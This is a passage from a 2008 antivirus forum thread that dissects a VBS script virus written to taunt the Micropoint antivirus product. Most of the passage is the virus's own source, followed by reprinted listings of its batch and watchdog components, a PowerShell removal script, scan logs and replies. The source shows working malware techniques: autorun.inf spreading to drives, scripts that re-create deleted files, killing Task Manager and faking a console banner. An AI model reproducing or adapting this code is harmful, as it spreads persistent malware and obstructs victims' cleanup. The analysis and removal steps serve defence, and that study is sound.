Set objFolder = fsofile.GetFolder("C:\aa")
If objFolder.Attributes = objFolder.Attributes AND 2 Then
    objFolder.Attributes = objFolder.Attributes XOR 2  
End If
'Create the BB.VBS file
set vbsfile=fsofile.CreateTextFile("c:\aa\bb.vbs", True)
vbsfile.WriteLine("Const HIDDEN_WINDOW = 12")
vbsfile.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
vbsfile.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
vbsfile.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
vbsfile.WriteLine("Set objStartup = objWMIService.Get("&Chr(34)&"Win32_ProcessStartup"&Chr(34)&")")
vbsfile.WriteLine("Set objConfig = objStartup.SpawnInstance_")
vbsfile.WriteLine("objConfig.ShowWindow = HIDDEN_WINDOW")
vbsfile.WriteLine("Set objProcess = GetObject("&Chr(34)&"winmgmts:root\cimv2:Win32_Process"&Chr(34)&")")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst z: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst x: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst m: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst n: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst y: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("Set shl = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
vbsfile.WriteLine("shl.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
vbsfile.WriteLine("set shl = nothing")
vbsfile.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon3.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon4.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon2.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon1.vbs"&Chr(34))
vbsfile.WriteLine("set run1=nothing")
vbsfile.WriteLine("Wscript.Echo("&Chr(34)&"微点您什么时候,才会对我下手"&Chr(34)&")")
vbsfile.Close
fsofile.CopyFile"c:\aa\bb.vbs","c:\windows\bb.dll"
'Create the cmd.bat file
set windowscmd=fsofile.CreateTextFile("c:\windows\cmd.bat", True)
windowscmd.WriteLine("@echo off")
windowscmd.WriteLine("echo [AUTORUN] >c:\autorun.inf")
windowscmd.WriteLine("echo OPEN=c:\windows\system32\cscript.exe c:\aa\cc.vbs >>c:\autorun.inf")
windowscmd.WriteLine("echo ICON=explorer.exe >>c:\autorun.inf")
windowscmd.WriteLine("echo [AUTORUN] >d:\autorun.inf")
windowscmd.WriteLine("echo OPEN=c:\windows\system32\cscript.exe c:\aa\cc.vbs >>d:\autorun.inf")
windowscmd.WriteLine("echo ICON=explorer.exe >>d:\autorun.inf")
windowscmd.WriteLine("attrib c:\autorun.inf +h +s +r")
windowscmd.WriteLine("attrib d:\autorun.inf +h +s +r")
windowscmd.WriteLine("cls")
windowscmd.WriteLine("copy c:\widnows\uctools.dll c:\windows\cc.vbs /y")
windowscmd.WriteLine("copy c:\windows\system32\backup.dll c:\windows\backup.vbs /y" )
windowscmd.WriteLine("cls")
windowscmd.WriteLine("echo set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&") >c:\windows\aa.vbs")
windowscmd.WriteLine("echo run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34)&" >>c:\windows\aa.vbs")
windowscmd.WriteLine("echo run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34)&" >>c:\windows\aa.vbs")
windowscmd.WriteLine("echo set run1=nothing>>c:\windows\aa.vbs")
windowscmd.WriteLine("cscript c:\windows\aa.vbs")
windowscmd.WriteLine("cls")
windowscmd.WriteLine("echo Microsoft Windows XP [版本 5.1.2600]")
windowscmd.WriteLine("echo (C) 版权所有 1985-2001 Microsoft Corp.")
windowscmd.WriteLine("echo.")
windowscmd.Close
'Create backup.dll, which watches the aa directory for changes
set dllfile=fsofile.CreateTextFile("c:\windows\system32\backup.dll", True)
dllfile.WriteLine("on error resume next")
dllfile.WriteLine("Set fsofile = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
dllfile.WriteLine("Set f = fsofile.CreateFolder("&Chr(34)&"c:\aa"&Chr(34)&")")
dllfile.WriteLine("fsofile.CopyFile "&Chr(34)&"c:\windows\bb.dll"&Chr(34)&","&Chr(34)&"c:\aa\bb.vbs"&Chr(34))
dllfile.WriteLine("set fsofile=nothing")
dllfile.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
dllfile.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
dllfile.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & _")
dllfile.WriteLine("strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
dllfile.WriteLine("Set colMonitoredEvents = objWMIService.ExecNotificationQuery _")
dllfile.WriteLine("("&Chr(34)&"SELECT * FROM __InstanceDeletionEvent WITHIN 10 WHERE "&Chr(34)&" _")
dllfile.WriteLine("& "&Chr(34)&"Targetinstance ISA 'CIM_DirectoryContainsFile' and "&Chr(34)&" _")
dllfile.WriteLine("& "&Chr(34)&"TargetInstance.GroupComponent= "&Chr(34)&" _")
dllfile.WriteLine("& "&Chr(34)&"'Win32_Directory.Name="&Chr(34)&Chr(34)&"c:\\\\aa"&Chr(34)&Chr(34)&"'"&Chr(34)&")")
dllfile.WriteLine("Do")
dllfile.WriteLine("Set objLatestEvent = colMonitoredEvents.NextEvent")
dllfile.WriteLine("WScript.Sleep 10000")
dllfile.WriteLine("Set fsofile = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
dllfile.WriteLine("Set f = fsofile.CreateFolder("&Chr(34)&"c:\aa"&Chr(34)&")")
dllfile.WriteLine("fsofile.CopyFile "&Chr(34)&"c:\windows\bb.dll"&Chr(34)&","&Chr(34)&"c:\aa\bb.vbs"&Chr(34))
dllfile.WriteLine("set fsofile=nothing")
dllfile.WriteLine("Loop")
dllfile.Close:
fsofile.CopyFile "c:\windows\system32\backup.dll","c:\windows\backup.vbs"
'Create the process monitor file mon1.vbs
set mon1=fsofile.CreateTextFile("c:\windows\system32\mon1.vbs", True)
mon1.WriteLine("on error resume next")
mon1.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon1.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon1.WriteLine(" & "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon1.WriteLine("Set colMonitoredProcesses = objWMIService. _")
mon1.WriteLine("ExecNotificationQuery("&Chr(34)&"select * from __instancedeletionevent "&Chr(34)&" _ ")
mon1.WriteLine("& "&Chr(34)&"within 1 where TargetInstance isa 'Win32_Process'"&Chr(34)&")")
mon1.WriteLine("i = 0")
mon1.WriteLine("Do While i = 0")
mon1.WriteLine("Set objLatestProcess = colMonitoredProcesses.NextEvent")
mon1.WriteLine("Set shl = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
mon1.WriteLine("shl.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon1.WriteLine("set shl = nothing")
mon1.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
mon1.WriteLine("'run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon1.WriteLine("run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34))
mon1.WriteLine("'run1.run"&Chr(34)&"c:\windows\system32\mon1.vbs"&Chr(34))
mon1.WriteLine("'run1.run"&Chr(34)&"c:\windows\system32\mon2.vbs"&Chr(34))
mon1.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon3.vbs"&Chr(34))
mon1.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon4.vbs"&Chr(34))
mon1.WriteLine("set run1=nothing")
mon1.WriteLine("Wscript.Echo("&Chr(34)&"可爱的微点,我将让您头痛的很"&Chr(34)&")")
mon1.WriteLine("Loop")
mon1.close
'Create the process monitor file mon2.vbs
set mon2=fsofile.CreateTextFile("c:\windows\system32\mon2.vbs", True)
mon2.WriteLine("on error resume next")
mon2.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon2.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon2.WriteLine(" & "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon2.WriteLine("Set colMonitoredProcesses = objWMIService. _")
mon2.WriteLine("ExecNotificationQuery("&Chr(34)&"select * from __instancedeletionevent "&Chr(34)&" _ ")
mon2.WriteLine("& "&Chr(34)&"within 1 where TargetInstance isa 'Win32_Process'"&Chr(34)&")")
mon2.WriteLine("i = 0:Do While i = 0:Set objLatestProcess = colMonitoredProcesses.NextEvent")
mon2.WriteLine("Set shl = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
mon2.WriteLine("shl.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon2.WriteLine("set shl = nothing")
mon2.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon1.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon2.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon3.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon4.vbs"&Chr(34))
mon2.WriteLine("set run1=nothing")
mon2.WriteLine("Loop")
mon2.close
'Create the Task Manager monitor mon3.vbs
set mon3=fsofile.CreateTextFile("c:\windows\system32\mon3.vbs", True)
mon3.WriteLine("on error resume next")
mon3.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon3.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon3.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon3.WriteLine("Set colMonitoredProcesses = objWMIService. _")
mon3.WriteLine("ExecNotificationQuery("&Chr(34)&"select * from __instancecreationevent "&Chr(34)&" _")
mon3.WriteLine("& " &Chr(34)&"within 1 where TargetInstance isa 'Win32_Process'"&Chr(34)&")")
mon3.WriteLine("i=0:Do While i = 0:Set objLatestProcess = colMonitoredProcesses.NextEvent")
mon3.WriteLine("If objLatestProcess.TargetInstance.Name = "&Chr(34)&"taskmgr.exe"&Chr(34)&" or objLatestProcess.TargetInstance.Name = "&Chr(34)&"TASKMGR.EXE"&Chr(34)&"  Then")
mon3.WriteLine("objLatestProcess.TargetInstance.Terminate")
mon3.WriteLine("End If:Loop")
mon3.close
'Create the windows directory monitor mon4.vbs
set mon4=fsofile.CreateTextFile("c:\windows\system32\mon4.vbs", True)
mon4.WriteLine("on error resume next")
mon4.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon4.WriteLine("on error resume next")
mon4.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon4.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon4.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & _")
mon4.WriteLine("strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon4.WriteLine("Set colMonitoredEvents = objWMIService.ExecNotificationQuery _")
mon4.WriteLine("("&Chr(34)&"SELECT * FROM __InstanceDeletionEvent WITHIN 10 WHERE "&Chr(34)&" _")
mon4.WriteLine("& "&Chr(34)&"Targetinstance ISA 'CIM_DirectoryContainsFile' and "&Chr(34)&" _")
mon4.WriteLine("& "&Chr(34)&"TargetInstance.GroupComponent= "&Chr(34)&" _")
mon4.WriteLine("& "&Chr(34)&"'Win32_Directory.Name="&Chr(34)&Chr(34)&"c:\\\\windows"&Chr(34)&Chr(34)&"'"&Chr(34)&")")
mon4.WriteLine("Do")
mon4.WriteLine("Set objLatestEvent = colMonitoredEvents.NextEvent")
mon4.WriteLine("WScript.Sleep 10000")
mon4.WriteLine("Set fsofile = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
mon4.WriteLine("fsofile.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon4.WriteLine("set fsofile=nothing")
mon4.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
mon4.WriteLine("run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon4.WriteLine("set run1=nothing:Loop")
mon4.close
set fsofile=nothing
'Run the 5 monitor programs
'''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''
set run1=createobject("WScript.Shell")  
run1.run"c:\windows\backup.vbs"  
run1.run"c:\windows\system32\mon1.vbs"
'run1.run"c:\windows\system32\mon2.vbs"
'run1.run"c:\windows\system32\mon3.vbs"
run1.run"c:\windows\system32\mon4.vbs"
set run1=nothing
Wscript.Echo("可爱的微点您一直对我无动于衷,这将使您的用户电脑系统死于我的手上,这同样也将成为您的坟墓,希望你为了自己的生存能够尽快解决")
Wscript.Echo("希望您(微点)能尽快解决,俺主人对国产杀毒是很看重的,特别是您(东方微点)跟费尔托斯是俺主人最为看重的两款杀毒软件,请您(微点)别让俺主人失望;俺主人其实并不是存心刁难您的,只是想让您(微点)的主人能够重视俺这类脚本病毒;在逛网页时像俺这样的脚本是很容易中的,相信您(微点)的主人比俺的主人跟清楚;俺的主人一直会期待着您能够拦截俺这类病毒.....")
Wscript.Echo("期待着黎明的阳光,期待微点的上市.........")
白玉箫
OP | Posted 2008-3-14 08:41:25
This guy is hilarious: he writes an autorun.inf, but only for the C and D drives, and on my machine D is a CD image. O(∩_∩)o... haha. Going into the windows directory you see 6 newly created files (if interested, download the windows rar package). Among them, cmd.bat's main job is to create the autorun; its code is as follows:
@echo off
rem Write an autorun.inf to C: and D: that launches the VBS payload through cscript
echo [AUTORUN] >c:\autorun.inf
echo OPEN=c:\windows\system32\cscript.exe c:\aa\cc.vbs >>c:\autorun.inf
echo ICON=explorer.exe >>c:\autorun.inf
echo [AUTORUN] >d:\autorun.inf
echo OPEN=c:\windows\system32\cscript.exe c:\aa\cc.vbs >>d:\autorun.inf
echo ICON=explorer.exe >>d:\autorun.inf
rem Hide both autorun.inf files (hidden + system + read-only)
attrib c:\autorun.inf +h +s +r
attrib d:\autorun.inf +h +s +r
cls
rem Note: "widnows" is misspelled in the sample, so this first copy never succeeds
copy c:\widnows\uctools.dll c:\windows\cc.vbs /y
copy c:\windows\system32\backup.dll c:\windows\backup.vbs /y
cls
rem Generate aa.vbs, which launches cc.vbs and backup.vbs, then run it
echo set run1=createobject("WScript.Shell") >c:\windows\aa.vbs
echo run1.run"c:\windows\cc.vbs" >>c:\windows\aa.vbs
echo run1.run"c:\windows\backup.vbs" >>c:\windows\aa.vbs
echo set run1=nothing>>c:\windows\aa.vbs
cscript c:\windows\aa.vbs
cls
rem Print a fake console banner: this file runs on every cmd.exe start via
rem HKLM\SOFTWARE\Microsoft\Command Processor\AutoRun, and clearing the screen
rem and reprinting the banner hides that from the user
echo Microsoft Windows XP [Version 5.1.2600]
echo (C) Copyright 1985-2001 Microsoft Corp.
echo.

Personally, I think that if it generated an autorun on every drive of the machine at once, that would be a real headache too.
backup.vbs's main job is to protect the aa folder; its code is as follows:
on error resume next
Set fsofile = CreateObject("Scripting.FileSystemObject")
Set f = fsofile.CreateFolder("c:\aa")
fsofile.CopyFile "c:\windows\bb.dll","c:\aa\bb.vbs"
set fsofile=nothing
' Subscribe to WMI file-deletion events for the c:\aa directory, polled every 10 seconds
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & _
strComputer & "\root\cimv2")
Set colMonitoredEvents = objWMIService.ExecNotificationQuery _
("SELECT * FROM __InstanceDeletionEvent WITHIN 10 WHERE " _
& "Targetinstance ISA 'CIM_DirectoryContainsFile' and " _
& "TargetInstance.GroupComponent= 'Win32_Directory.Name=""c:\\\\aa""'")
' Each time a file disappears from c:\aa, wait 10 s, then re-create the folder and bb.vbs
Do
Set objLatestEvent = colMonitoredEvents.NextEvent
WScript.Sleep 10000
Set fsofile = CreateObject("Scripting.FileSystemObject")
Set f = fsofile.CreateFolder("c:\aa")
fsofile.CopyFile "c:\windows\bb.dll","c:\aa\bb.vbs"
set fsofile=nothing
Loop

This time the log no longer shows the files being created in system32 so obviously, but once you go into system32 you still see the familiar faces; anyone interested can download the system32 rar package.
Fix:
The simple way: find an AV that can kill this and let it clean up.
Install a restore card or restore-type software, then clean up the autorun.inf.
The complex way: manual removal, again with the reverse-thinking approach: undo it in reverse order.
Closing thoughts: although the author's approach in this version is roughly the same as the previous one, it has become a lot tighter. For example, after it runs Task Manager is normally no longer visible, the process list is no longer just the original 3 processes, and the protection of the aa folder has been strengthened. All of this interferes with normal cleanup and deletion. But personally I think the script that writes the autorun.inf to protect aa isn't written very well: it doesn't check how many drives the computer has and just adds C and D.
Looking forward to the author's next work.
So tired, I'll stop here. Thinking about having to work overtime this week is depressing..... ugh~~~~ off to sleep
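The "undo it in reverse order" approach above, as an added example that is not part of the original post: a manual cleanup written from the paths and registry values shown in the listings of 1.vbs, cmd.bat and backup.vbs. It assumes Windows PowerShell run as administrator and that the sample landed in its default locations (C:\Windows, C:\Windows\System32, C:\aa). The order matters: the watchdog scripts re-create deleted files within about 10 seconds, so the script hosts are stopped before anything is removed, and the work is done from PowerShell rather than cmd.exe because the Command Processor\AutoRun value runs cmd.bat on every cmd.exe start.

```powershell
# Added example (not the original poster's code): reverse-order cleanup of the sample.
# Assumptions: Windows PowerShell as administrator; default drop locations from the listings.

# 1. Stop the script hosts first. backup.vbs and mon*.vbs re-create anything deleted
#    from c:\aa or c:\windows, so deleting files before this step only feeds the watchdog.
Get-WmiObject Win32_Process -Filter "Name='wscript.exe' OR Name='cscript.exe'" |
    ForEach-Object {
        Write-Host ("Stopping PID {0}: {1}" -f $_.ProcessId, $_.CommandLine)
        Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue
    }

# 2. Registry persistence written by 1.vbs (see the RegWrite calls in the listing).
$runEntries = @(
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Command Processor';                            Name = 'AutoRun' }
    @{ Path = 'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows';            Name = 'load' }
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run'; Name = 'KernelFaultCheck' }
)
foreach ($e in $runEntries) {
    $item = Get-ItemProperty -Path $e.Path -Name $e.Name -ErrorAction SilentlyContinue
    if ($item) {
        Write-Host ("Removing {0}\{1} = {2}" -f $e.Path, $e.Name, $item.($e.Name))
        Remove-ItemProperty -Path $e.Path -Name $e.Name
    }
}

# 3. Undo the "hide hidden files" change (Windows defaults: CheckedValue 1, DefaultValue 2)
#    and disable AutoRun for every drive type (0xFF) rather than restoring the sample's value.
$showAll = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL'
Set-ItemProperty -Path $showAll -Name CheckedValue -Value 1 -Type DWord
Set-ItemProperty -Path $showAll -Name DefaultValue -Value 2 -Type DWord
$policy = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
if (-not (Test-Path $policy)) { New-Item -Path $policy -Force | Out-Null }
Set-ItemProperty -Path $policy -Name NoDriveTypeAutoRun -Value 0xFF -Type DWord

# 4. autorun.inf on every local fixed disk (DriveType 3), not just C: and D:.
#    Print it before removing it and flag OPEN= lines that call a script host.
foreach ($drive in Get-WmiObject Win32_LogicalDisk -Filter "DriveType=3") {
    $inf = $drive.DeviceID + '\autorun.inf'
    if (Test-Path -LiteralPath $inf) {
        Write-Host "autorun.inf found on $($drive.DeviceID)"
        Get-Content -LiteralPath $inf | ForEach-Object {
            if ($_ -match '^\s*open\s*=.*(cscript|wscript)') { Write-Host "  !! $_" } else { Write-Host "     $_" }
        }
        attrib -h -s -r $inf
        Remove-Item -LiteralPath $inf -Force
    }
}

# 5. Files and the folder named in the listings above.
$dropped = @(
    'C:\Windows\cmd.bat', 'C:\Windows\cc.vbs', 'C:\Windows\aa.vbs', 'C:\Windows\backup.vbs',
    'C:\Windows\vv.dll', 'C:\Windows\uctools.dll', 'C:\Windows\bb.dll',
    'C:\Windows\System32\backup.dll',
    'C:\Windows\System32\mon1.vbs', 'C:\Windows\System32\mon2.vbs',
    'C:\Windows\System32\mon3.vbs', 'C:\Windows\System32\mon4.vbs',
    'C:\aa'
)
foreach ($p in $dropped) {
    if (Test-Path -LiteralPath $p) {
        Remove-Item -LiteralPath $p -Recurse -Force
        Write-Host "Removed $p"
    }
}
```

After a reboot, re-run the first Get-WmiObject query: if any wscript.exe or cscript.exe is back with one of the paths above on its command line, a launch point was missed and the watchdog has restored the files, so repeat from step 1.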
白玉箫 (OP) | Posted 2008-3-14 08:42:58
Attached: windows.rar (files generated under windows) and system.rar (files generated under system32),
for anyone interested in further research.

hahacomcn | Posted 2008-3-14 09:51:02
Begin scan in 'C:\Documents and Settings\haha\桌面\system32.rar'
C:\Documents and Settings\haha\桌面\system32.rar
  [0] Archive type: RAR
  --> backup.dll
      [DETECTION] Contains detection pattern of the VBS script virus VBS/CopyFile
      [INFO]      A backup was created as '484cda93.qua'  ( QUARANTINE )
Begin scan in 'C:\Documents and Settings\haha\桌面\WINDOWS.rar'
C:\Documents and Settings\haha\桌面\WINDOWS.rar
  [0] Archive type: RAR
  --> backup.vbs
      [DETECTION] Contains detection pattern of the VBS script virus VBS/CopyFile
  --> vv.dll
      [DETECTION] Contains detection pattern of the VBS script virus VBS/Runner.AH
  --> uctools.dll
      [DETECTION] Contains detection pattern of the VBS script virus VBS/Runner.AH
  --> cc.vbs
      [DETECTION] Contains detection pattern of the VBS script virus VBS/Runner.AH
  --> cmd.bat
      [DETECTION] Contains detection pattern of the batch virus BAT/AutoRun.Q
      [INFO]      A backup was created as '4827da64.qua'  ( QUARANTINE )


End of the scan: 2008-03-14  09:51
Used time: 00:03 min

The scan has been done completely.

      0 Scanning directories
     15 Files were scanned
      6 viruses and/or unwanted programs were found
      0 Files were classified as suspicious:
      0 files were deleted
      0 files were repaired
      2 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
      9 Files not concerned
      2 Archives were scanned
      0 Warnings
      0 Notes
hahacomcn | Posted 2008-3-14 09:52:36
Virus or unwanted program 'VBS/Runner.AH [VBS/Runner.AH]'
detected in file 'C:\Documents and Settings\haha\Local Settings\Temp\Rar$DR00.157\1.vbs.
Action performed: Delete file
白玉箫 (OP) | Posted 2008-3-14 10:05:05
This one was made specifically for Micropoint.
Nblock | Posted 2008-3-14 10:19:45
Micropoint has more and more supporters. Personally I suggest the author give Micropoint another prod, something as memorable as the batch-file disk formatter or 磁碟机.
Copyright © KaFan  KaFan.cn All Rights Reserved.